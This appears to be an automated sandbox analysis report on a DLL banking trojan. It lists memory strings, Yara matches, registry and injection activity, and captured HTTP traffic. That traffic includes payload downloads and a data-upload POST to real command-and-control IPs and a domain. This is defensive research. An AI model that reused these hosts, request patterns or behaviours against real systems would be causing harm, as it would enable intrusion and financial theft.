00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.osofts/Microt0
Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://curlmyip.net
Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/spotify
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknown | DNS traffic detected: queries for: resolver1.opendns.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global traffic | HTTP traffic detected:
                          GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 185.189.151.28
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 185.189.151.28
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 185.189.151.28
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /stilak32.rar HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: 193.56.146.127
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /stilak64.rar HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: 193.56.146.127
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /cook32.rar HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: 193.56.146.127
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /cook64.rar HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: 193.56.146.127
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: cabrioxmdes.at
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 (50 identical entries)
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: unknown | HTTP traffic detected:
                          POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1
                          Content-Type: multipart/form-data; boundary=318247997342640097891112487322
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                          Host: cabrioxmdes.at
                          Content-Length: 563
                          Connection: Keep-Alive
                          Cache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara match | File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06288E57 CreateProcessAsUserW,
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 2oCOO5LbPu.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2oCOO5LbPu.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
